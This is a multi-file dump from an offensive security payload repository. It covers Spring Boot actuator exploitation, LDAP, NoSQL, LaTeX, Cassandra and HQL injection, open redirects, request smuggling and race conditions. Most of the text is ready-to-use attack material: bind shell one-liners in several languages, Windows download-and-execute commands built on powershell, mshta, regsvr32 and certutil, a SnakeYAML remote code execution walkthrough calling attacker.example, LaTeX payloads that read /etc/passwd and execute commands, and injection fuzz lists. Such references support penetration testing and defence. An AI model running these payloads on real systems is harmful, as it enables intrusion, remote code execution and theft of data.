58 | * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 59 | * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) -------------------------------------------------------------------------------- /Insecure Management Interface/Intruder/springboot_actuator.txt: -------------------------------------------------------------------------------- 1 | auditevents 2 | autoconfig 3 | beans 4 | caches 5 | conditions 6 | configprops 7 | dump 8 | env 9 | flyway 10 | health 11 | heapdump 12 | httptrace 13 | info 14 | integrationgraph 15 | jolokia 16 | logfile 17 | loggers 18 | liquibase 19 | metrics 20 | mappings 21 | prometheus 22 | scheduledtasks 23 | sessions 24 | shutdown 25 | threaddump 26 | trace 27 | actuator/auditevents 28 | actuator/autoconfig 29 | actuator/beans 30 | actuator/caches 31 | actuator/conditions 32 | actuator/configprops 33 | actuator/dump 34 | actuator/env 35 | actuator/flyway 36 | actuator/health 37 | actuator/heapdump 38 | actuator/httptrace 39 | actuator/info 40 | actuator/integrationgraph 41 | actuator/jolokia 42 | actuator/logfile 43 | actuator/loggers 44 | actuator/liquibase 45 | actuator/metrics 46 | actuator/mappings 47 | actuator/prometheus 48 | actuator/scheduledtasks 49 | actuator/sessions 50 | actuator/shutdown 51 | actuator/threaddump 52 | actuator/trace -------------------------------------------------------------------------------- /Insecure Management Interface/README.md: -------------------------------------------------------------------------------- 1 | # Insecure management interface 2 | 3 | ## Springboot-Actuator 4 | 5 | Actuator endpoints let you monitor and interact with your application. 6 | Spring Boot includes a number of built-in endpoints and lets you add your own. 7 | For example, the `/health` endpoint provides basic application health information. 8 | 9 | Some of them contains sensitive info such as : 10 | 11 | - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). 12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). 13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. 14 | - `/dump` - Displays a dump of threads (including a stack trace). 15 | - `/logfile` - Outputs the contents of the log file. 16 | - `/mappings` - Shows all of the MVC controller mappings. 17 | 18 | These endpoints are enabled by default in Springboot 1.X. 19 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. 20 | 21 | Since Springboot 2.X only `/health` and `/info` are enabled by default. 22 | 23 | ### Remote Code Execution via `/env` 24 | 25 | Spring is able to load external configurations in the YAML format. 26 | The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. 27 | In other words, an attacker can gain remote code execution by loading a malicious config file. 28 | 29 | #### Steps 30 | 31 | 1. Generate a payload of SnakeYAML deserialization gadget. 32 | 33 | - Build malicious jar 34 | ```bash 35 | git clone https://github.com/artsploit/yaml-payload.git 36 | cd yaml-payload 37 | # Edit the payload before executing the last commands (see below) 38 | javac src/artsploit/AwesomeScriptEngineFactory.java 39 | jar -cvf yaml-payload.jar -C src/ . 40 | ``` 41 | 42 | - Edit src/artsploit/AwesomeScriptEngineFactory.java 43 | 44 | ```java 45 | public AwesomeScriptEngineFactory() { 46 | try { 47 | Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE 48 | } catch (IOException e) { 49 | e.printStackTrace(); 50 | } 51 | } 52 | ``` 53 | 54 | - Create a malicious yaml config (yaml-payload.yml) 55 | 56 | ```yaml 57 | !!javax.script.ScriptEngineManager [ 58 | !!java.net.URLClassLoader [[ 59 | !!java.net.URL ["http://attacker.example/yaml-payload.jar"] 60 | ]] 61 | ] 62 | ``` 63 | 64 | 65 | 2. Host the malicious files on your server. 66 | 67 | - yaml-payload.jar 68 | - yaml-payload.yml 69 | 70 | 71 | 3. Change `spring.cloud.bootstrap.location` to your server. 72 | 73 | ``` 74 | POST /env HTTP/1.1 75 | Host: victim.example:8090 76 | Content-Type: application/x-www-form-urlencoded 77 | Content-Length: 59 78 | 79 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml 80 | ``` 81 | 82 | 4. Reload the configuration. 83 | 84 | ``` 85 | POST /refresh HTTP/1.1 86 | Host: victim.example:8090 87 | Content-Type: application/x-www-form-urlencoded 88 | Content-Length: 0 89 | ``` 90 | 91 | ## References 92 | 93 | * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) 94 | * [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) 95 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | *()|%26' 5 | *()|&' 6 | *(|(mail=*)) 7 | *(|(objectclass=*)) 8 | *)(uid=*))(|(uid=* 9 | */* 10 | *| 11 | / 12 | // 13 | //* 14 | @* 15 | | 16 | admin* 17 | admin*)((|userpassword=*) 18 | admin*)((|userPassword=*) 19 | x' or name()='username' or 'x'='y 20 | ! 21 | %21 22 | %26 23 | %28 24 | %29 25 | %2A%28%7C%28mail%3D%2A%29%29 26 | %2A%28%7C%28objectclass%3D%2A%29%29 27 | %2A%7C 28 | %7C 29 | & 30 | ( 31 | ) 32 | )(cn=))\x00 33 | *(|(mail=*)) 34 | *(|(objectclass=*)) 35 | */* 36 | *| 37 | / 38 | // 39 | //* 40 | @* 41 | x' or name()='username' or 'x'='y 42 | | 43 | *()|&' 44 | admin* 45 | admin*)((|userpassword=*) 46 | *)(uid=*))(|(uid=* 47 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_attributes.txt: -------------------------------------------------------------------------------- 1 | c 2 | cn 3 | co 4 | commonName 5 | dc 6 | facsimileTelephoneNumber 7 | givenName 8 | gn 9 | homePhone 10 | id 11 | jpegPhoto 12 | l 13 | mail 14 | mobile 15 | name 16 | o 17 | objectClass 18 | ou 19 | owner 20 | pager 21 | password 22 | sn 23 | st 24 | surname 25 | uid 26 | username 27 | userPassword 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Swissky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LaTeX Injection/README.md: -------------------------------------------------------------------------------- 1 | # LaTex Injection 2 | 3 | ## Read file 4 | 5 | ```bash 6 | \input{/etc/passwd} 7 | \include{password} # load .tex file 8 | ``` 9 | 10 | Read single lined file 11 | 12 | ```bash 13 | \newread\file 14 | \openin\file=/etc/issue 15 | \read\file to\line 16 | \text{\line} 17 | \closein\file 18 | ``` 19 | 20 | Read multiple lined file 21 | 22 | ```bash 23 | \newread\file 24 | \openin\file=/etc/passwd 25 | \loop\unless\ifeof\file 26 | \read\file to\fileline 27 | \text{\fileline} 28 | \repeat 29 | \closein\file 30 | ``` 31 | 32 | Read text file, keep the formatting 33 | 34 | ```bash 35 | \usepackage{verbatim} 36 | \verbatiminput{/etc/passwd} 37 | ``` 38 | 39 | ## Write file 40 | 41 | ```bash 42 | \newwrite\outfile 43 | \openout\outfile=cmd.tex 44 | \write\outfile{Hello-world} 45 | \closeout\outfile 46 | ``` 47 | 48 | ## Command execution 49 | 50 | The input of the command will be redirected to stdin, use a temp file to get it. 51 | 52 | ```bash 53 | \immediate\write18{env > output} 54 | \input{output} 55 | ``` 56 | 57 | If you get any LaTex error, consider using base64 to get the result without bad characters 58 | 59 | ```bash 60 | \immediate\write18{env | base64 > test.tex} 61 | \input{text.tex} 62 | ``` 63 | 64 | ```bash 65 | \input|ls|base4 66 | \input{|"/bin/hostname"} 67 | ``` 68 | 69 | ## Cross Site Scripting 70 | 71 | From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 72 | ```bash 73 | \url{javascript:alert(1)} 74 | \href{javascript:alert(1)}{placeholder} 75 | ``` 76 | 77 | Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` 78 | 79 | ## References 80 | 81 | * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) 82 | * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) 83 | * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) -------------------------------------------------------------------------------- /Methodology and Resources/Bind Shell Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Bind Shell 2 | 3 | ## Summary 4 | 5 | * [Bind Shell](#bind-shell) 6 | * [Perl](#perl) 7 | * [Python](#python) 8 | * [PHP](#php) 9 | * [Ruby](#ruby) 10 | * [Netcat Traditional](#netcat-traditional) 11 | * [Netcat OpenBsd](#netcat-openbsd) 12 | * [Ncat](#ncat) 13 | * [Socat](#socat) 14 | * [Powershell](#powershell) 15 | 16 | 17 | ## Perl 18 | 19 | ```perl 20 | perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ 21 | bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ 22 | close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' 23 | ``` 24 | 25 | ## Python 26 | 27 | Single line : 28 | ```python 29 | python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' 30 | ``` 31 | 32 | Expanded version : 33 | 34 | ```python 35 | import socket as s,subprocess as sp; 36 | 37 | s1 = s.socket(s.AF_INET, s.SOCK_STREAM); 38 | s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); 39 | s1.bind(("0.0.0.0", 51337)); 40 | s1.listen(1); 41 | c, a = s1.accept(); 42 | 43 | while True: 44 | d = c.recv(1024).decode(); 45 | p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); 46 | c.sendall(p.stdout.read()+p.stderr.read()) 47 | ``` 48 | 49 | ## PHP 50 | 51 | ```php 52 | php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ 53 | socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ 54 | $in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ 55 | socket_write($cl,$m,strlen($m));}}' 56 | ``` 57 | 58 | ## Ruby 59 | 60 | ```ruby 61 | ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' 62 | ``` 63 | 64 | ## Netcat Traditional 65 | 66 | ```powershell 67 | nc -nlvp 51337 -e /bin/bash 68 | ``` 69 | 70 | ## Netcat OpenBsd 71 | 72 | ```powershell 73 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f 74 | ``` 75 | 76 | ## Socat 77 | 78 | ```powershell 79 | user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 80 | user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane 81 | ``` 82 | 83 | ## Powershell 84 | 85 | ```powershell 86 | https://github.com/besimorhino/powercat 87 | 88 | # Victim (listen) 89 | . .\powercat.ps1 90 | powercat -l -p 7002 -ep 91 | 92 | # Connect from attacker 93 | . .\powercat.ps1 94 | powercat -c 127.0.0.1 -p 7002 95 | ``` 96 | -------------------------------------------------------------------------------- /Methodology and Resources/Miscellaneous - Tricks.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous & Tricks 2 | 3 | All the tricks that couldn't be classified somewhere else. 4 | 5 | ## Send a message to another user 6 | 7 | ```powershell 8 | # Windows 9 | PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" 10 | PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" 11 | 12 | # Linux 13 | $ wall "Stop messing with the XXX service !" 14 | $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root 15 | $ who 16 | $ write root pts/2 # press Ctrl+D after typing the message. 17 | ``` -------------------------------------------------------------------------------- /Methodology and Resources/Windows - Download and Execute.md: -------------------------------------------------------------------------------- 1 | # Windows - Download and execute methods 2 | 3 | ## Downloaded files location 4 | 5 | - C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files\ 6 | - C:\Users\\AppData\Local\Microsoft\Windows\INetCache\IE\ 7 | - C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV 8 | 9 | ## Powershell 10 | 11 | From an HTTP server 12 | 13 | ```powershell 14 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" 15 | ``` 16 | 17 | From a Webdav server 18 | 19 | ```powershell 20 | powershell -exec bypass -f \\webdavserver\folder\payload.ps1 21 | ``` 22 | 23 | ## Cmd 24 | 25 | ```powershell 26 | cmd.exe /k < \\webdavserver\folder\batchfile.txt 27 | ``` 28 | 29 | ## Cscript / Wscript 30 | 31 | ```powershell 32 | cscript //E:jscript \\webdavserver\folder\payload.txt 33 | ``` 34 | 35 | ## Mshta 36 | 37 | ```powershell 38 | mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) 39 | ``` 40 | 41 | ```powershell 42 | mshta http://webserver/payload.hta 43 | ``` 44 | 45 | ```powershell 46 | mshta \\webdavserver\folder\payload.hta 47 | ``` 48 | 49 | ## Rundll32 50 | 51 | ```powershell 52 | rundll32 \\webdavserver\folder\payload.dll,entrypoint 53 | ``` 54 | 55 | ```powershell 56 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); 57 | ``` 58 | 59 | ## Regasm / Regsvc @subTee 60 | 61 | ```powershell 62 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll 63 | ``` 64 | 65 | ## Regsvr32 @subTee 66 | 67 | ```powershell 68 | regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll 69 | ``` 70 | 71 | ```powershell 72 | regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll 73 | ``` 74 | 75 | ## Odbcconf 76 | 77 | ```powershell 78 | odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} 79 | ``` 80 | 81 | ## Msbuild 82 | 83 | ```powershell 84 | cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" 85 | ``` 86 | 87 | ## Certutil 88 | 89 | ```powershell 90 | certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll 91 | ``` 92 | 93 | ```powershell 94 | certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe 95 | ``` 96 | 97 | ## Bitsadmin 98 | 99 | ```powershell 100 | bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe 101 | ``` 102 | 103 | 104 | ## References 105 | 106 | - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) 107 | -------------------------------------------------------------------------------- /NoSQL Injection/Intruder/NoSQL.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | ';sleep(5000); 19 | ';sleep(5000);' 20 | ';sleep(5000);+' 21 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); 22 | -------------------------------------------------------------------------------- /Open Redirect/Intruder/open_redirect_wordlist.txt: -------------------------------------------------------------------------------- 1 | /http://example.com 2 | /%5cexample.com 3 | /%2f%2fexample.com 4 | /example.com/%2f%2e%2e 5 | /http:/example.com 6 | /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 7 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 8 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com 9 | /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 10 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 11 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com 12 | /.example.com 13 | ///\;@example.com 14 | ///example.com/ 15 | ///example.com 16 | ///example.com/%2f.. 17 | /////example.com/ 18 | /////example.com -------------------------------------------------------------------------------- /Open Redirect/Intruder/openredirects.txt: -------------------------------------------------------------------------------- 1 | /%09/example.com 2 | /%2f%2fexample.com 3 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ 4 | /%5cexample.com 5 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 6 | /.example.com 7 | //%09/example.com 8 | //%5cexample.com 9 | ///%09/example.com 10 | ///%5cexample.com 11 | ////%09/example.com 12 | ////%5cexample.com 13 | /////example.com 14 | /////example.com/ 15 | ////\;@example.com 16 | ////example.com/ 17 | ////example.com/%2e%2e 18 | ////example.com/%2e%2e%2f 19 | ////example.com/%2f%2e%2e 20 | ////example.com/%2f.. 21 | ////example.com// 22 | ///\;@example.com 23 | ///example.com 24 | ///example.com/ 25 | ///example.com/%2e%2e 26 | ///example.com/%2e%2e%2f 27 | ///example.com/%2f%2e%2e 28 | ///example.com/%2f.. 29 | ///example.com// 30 | //example.com 31 | //example.com/ 32 | //example.com/%2e%2e 33 | //example.com/%2e%2e%2f 34 | //example.com/%2f%2e%2e 35 | //example.com/%2f.. 36 | //example.com// 37 | //google%00.com 38 | //google%E3%80%82com 39 | //https:///example.com/%2e%2e 40 | //https://example.com/%2e%2e%2f 41 | //https://example.com// 42 | /<>//example.com 43 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 44 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com 45 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 46 | /\/\/example.com/ 47 | /\/example.com/ 48 | /example.com/%2f%2e%2e 49 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d 50 | /http://example.com 51 | /http:/example.com 52 | /https:/%5cexample.com/ 53 | /https://%09/example.com 54 | /https://%5cexample.com 55 | /https:///example.com/%2e%2e 56 | /https:///example.com/%2f%2e%2e 57 | /https://example.com 58 | /https://example.com/ 59 | /https://example.com/%2e%2e 60 | /https://example.com/%2e%2e%2f 61 | /https://example.com/%2f%2e%2e 62 | /https://example.com/%2f.. 63 | /https://example.com// 64 | /https:example.com 65 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 66 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com 67 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 68 | -------------------------------------------------------------------------------- /Race Condition/README.md: -------------------------------------------------------------------------------- 1 | # Race Condition 2 | 3 | > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Turbo Intruder Examples](#turbo-intruder-examples) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | * [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) 14 | 15 | ## Turbo Intruder Examples 16 | 17 | 1. Send request to turbo intruder 18 | 2. Use this python code as a payload of the turbo intruder 19 | ```python 20 | def queueRequests(target, wordlists): 21 | engine = RequestEngine(endpoint=target.endpoint, 22 | concurrentConnections=30, 23 | requestsPerConnection=30, 24 | pipeline=False 25 | ) 26 | 27 | for i in range(30): 28 | engine.queue(target.req, i) 29 | engine.queue(target.req, target.baseInput, gate='race1') 30 | 31 | 32 | engine.start(timeout=5) 33 | engine.openGate('race1') 34 | 35 | engine.complete(timeout=60) 36 | 37 | 38 | def handleResponse(req, interesting): 39 | table.add(req) 40 | ``` 41 | 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 42 | 4. Click "Attack" 43 | 44 | 45 | ## References 46 | 47 | * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) 48 | * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) 49 | * [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) -------------------------------------------------------------------------------- /Request Smuggling/README.md: -------------------------------------------------------------------------------- 1 | # Request Smuggling 2 | 3 | ## Summary 4 | 5 | * [Tools](#tools) 6 | * [CL.TE vulnerabilities](#cl.te-vulnerabilities) 7 | * [TE.CL vulnerabilities](#te.cl-vulnerabilities) 8 | * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | * [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) 14 | * [Smuggler](https://github.com/defparam/smuggler) 15 | 16 | ## CL.TE vulnerabilities 17 | 18 | > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. 19 | 20 | ```powershell 21 | POST / HTTP/1.1 22 | Host: vulnerable-website.com 23 | Content-Length: 13 24 | Transfer-Encoding: chunked 25 | 26 | 0 27 | 28 | SMUGGLED 29 | ``` 30 | 31 | Example: 32 | 33 | ```powershell 34 | POST / HTTP/1.1 35 | Host: domain.example.com 36 | Connection: keep-alive 37 | Content-Type: application/x-www-form-urlencoded 38 | Content-Length: 6 39 | Transfer-Encoding: chunked 40 | 41 | 0 42 | 43 | G 44 | ``` 45 | 46 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te 47 | 48 | ## TE.CL vulnerabilities 49 | 50 | > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. 51 | 52 | ```powershell 53 | POST / HTTP/1.1 54 | Host: vulnerable-website.com 55 | Content-Length: 3 56 | Transfer-Encoding: chunked 57 | 58 | 8 59 | SMUGGLED 60 | 0 61 | ``` 62 | 63 | Example: 64 | 65 | ```powershell 66 | POST / HTTP/1.1 67 | Host: domain.example.com 68 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 69 | Content-Length: 4 70 | Connection: close 71 | Content-Type: application/x-www-form-urlencoded 72 | Accept-Encoding: gzip, deflate 73 | 74 | 5c 75 | GPOST / HTTP/1.1 76 | Content-Type: application/x-www-form-urlencoded 77 | Content-Length: 15 78 | x=1 79 | 0 80 | 81 | 82 | ``` 83 | 84 | :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0. 85 | 86 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl 87 | 88 | ## TE.TE behavior: obfuscating the TE header 89 | 90 | > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way. 91 | 92 | ```powershell 93 | Transfer-Encoding: xchunked 94 | Transfer-Encoding : chunked 95 | Transfer-Encoding: chunked 96 | Transfer-Encoding: x 97 | Transfer-Encoding:[tab]chunked 98 | [space]Transfer-Encoding: chunked 99 | X: X[\n]Transfer-Encoding: chunked 100 | Transfer-Encoding 101 | : chunked 102 | ``` 103 | 104 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header 105 | 106 | ## References 107 | 108 | * [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 109 | * [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0) 110 | -------------------------------------------------------------------------------- /SAML Injection/Images/SAML-xml-flaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SAML Injection/Images/SAML-xml-flaw.png -------------------------------------------------------------------------------- /SAML Injection/Images/XSLT1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SAML Injection/Images/XSLT1.jpg -------------------------------------------------------------------------------- /SQL Injection/Cassandra Injection.md: -------------------------------------------------------------------------------- 1 | # Cassandra Injection 2 | 3 | > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system 4 | 5 | ## Summary 6 | 7 | * [Cassandra comment](#cassandra-comment) 8 | * [Cassandra - Login Bypass](#cassandra---login-bypass) 9 | * [Login Bypass 0](#login-bypass-0) 10 | * [Login Bypass 1](#login-bypass-1) 11 | * [References](#references) 12 | 13 | ## Cassandra comment 14 | 15 | ```sql 16 | /* Cassandra Comment */ 17 | ``` 18 | 19 | ## Cassandra - Login Bypass 20 | 21 | ### Login Bypass 0 22 | 23 | ```sql 24 | username: admin' ALLOW FILTERING; %00 25 | password: ANY 26 | ``` 27 | 28 | ### Login Bypass 1 29 | 30 | ```sql 31 | username: admin'/* 32 | password: */and pass>' 33 | ``` 34 | 35 | The injection would look like the following SQL query 36 | 37 | ```sql 38 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 39 | ``` 40 | 41 | ## References 42 | 43 | 44 | -------------------------------------------------------------------------------- /SQL Injection/HQL Injection.md: -------------------------------------------------------------------------------- 1 | # Hibernate Query Language Injection 2 | 3 | > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia 4 | ## Summary 5 | 6 | * [HQL Comments](#hql-comments) 7 | * [HQL List Columns](#hql-list-columns) 8 | * [HQL Error Based](#hql-error-based) 9 | * [References](#references) 10 | 11 | ## HQL Comments 12 | 13 | ```sql 14 | HQL does not support comments 15 | ``` 16 | 17 | ## HQL List Columns 18 | 19 | ```sql 20 | from BlogPosts 21 | where title like '%' 22 | and DOESNT_EXIST=1 and ''='%' -- 23 | and published = true 24 | ``` 25 | 26 | Using an unexisting column will an exception leaking several columns names. 27 | 28 | ```sql 29 | org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement: 30 | select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159] 